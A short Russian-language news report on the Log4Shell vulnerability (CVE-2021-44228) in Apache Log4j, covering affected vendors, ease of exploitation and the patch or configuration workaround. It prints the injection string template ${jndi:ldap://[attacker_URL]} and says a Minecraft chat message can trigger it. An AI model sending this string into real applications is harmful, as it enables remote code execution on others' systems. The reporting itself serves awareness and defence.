Новая 0day-уязвимость затрагивает миллионы приложений, крупнейшие компании

Уязвимости присвоен код CVE-2021-44228 и максимальный уровень опасности по шкале CVSS. Она кроется в библиотеке Apache Log4j, которую используют для ведения логов миллионы Java-приложений.

Для атаки достаточно заставить приложение внести в журнал лишь одну строку кода в формате ${jndi:ldap://[attacker_URL]}, что позволит в дальнейшем интегрировать в него собственный код. В открытый доступ уже выложены рабочие эксплойты, а злоумышленники активно сканируют сеть в поисках уязвимых подключённых устройств. Эксперты по кибербезопасности ожидают, что в ближайшие дни атаки на подверженные системы участятся.

Уязвимость затрагивает Amazon, Apple, Steam, Minecraft, Tesla, Red Hat и множество других компаний, в софте которых используется библиотека. К примеру, в случае Minecraft взломать серверы и компьютеры геймеров можно, отправив сообщение с кодом в окно чата.

Особую серьёзность уязвимости придаёт то, насколько она проста в эксплуатации (атаку может осуществить даже неопытный хакер), насколько обширный контроль может обеспечить злоумышленнику и насколько вездесуща сама библиотека, поэтому потенциальный ущерб огромен.

Apache Foundation в прошлую пятницу выпустила патч и советует разработчикам обновить библиотеку до версии 2.15.0. Если сделать это нет возможности, рекомендуется перевести параметр log4j2.formatMsgNoLookups в значение true.